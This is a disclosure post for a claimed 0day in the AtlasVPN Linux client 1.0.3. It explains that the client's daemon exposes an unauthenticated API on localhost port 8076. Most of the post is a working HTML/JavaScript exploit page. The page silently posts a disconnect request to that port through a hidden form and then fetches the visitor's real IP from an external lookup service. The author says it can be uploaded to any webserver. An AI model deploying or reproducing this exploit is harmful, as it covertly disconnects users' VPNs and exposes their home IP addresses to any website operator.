Remote disconnect exploit for AtlasVPN Linux client version 1.0.3 that will allow a remote website to extract a client’s real IP address.
The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.
Root Cause
The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.
Exploit Code
The following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.
<html>
<head>
<title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
<body>
<pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
</code></pre>
<iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
<form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
<button type="submit" style="display: none"></button>
</form>
<script>
window._currentIP = false;
// Run main exploit code
window.addEventListener('load', function () {
addIPToLog();
setTimeout(triggerFormSubmission, 1000);
setTimeout(addIPToLog, 3000);
});
// Blind CORS request to atlasvpnd to disconnect the VPN
function triggerFormSubmission() {
var logDiv = document.getElementById('log');
logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...n";
document.getElementById('stopForm').submit();
}
// Gets IP from ipfy API (this, of course, could be your server)
function addIPToLog() {
var logDiv = document.getElementById('log');
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://api.ipify.org?format=json', true);
xhr.onload = function () {
var ipAddress = window._currentIP;
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
ipAddress = response.ip;
logDiv.innerHTML += '[?] Current IP:' + ipAddress + "n";
} else {
logDiv.innerHTML += '[-] Error fetching IP address.n';
}
// Check if the IP changed. If yes: Success.
if (window._currentIP && window._currentIP != ipAddress) {
logDiv.innerHTML += "[+] Successfully disconnected VPN."
}
if (window._currentIP && window._currentIP == ipAddress) {
logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
}
// Save IP for next iteration.
window._currentIP = ipAddress;
};
xhr.send();
}
</script>
</body>
</html>
Greets
Fly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.
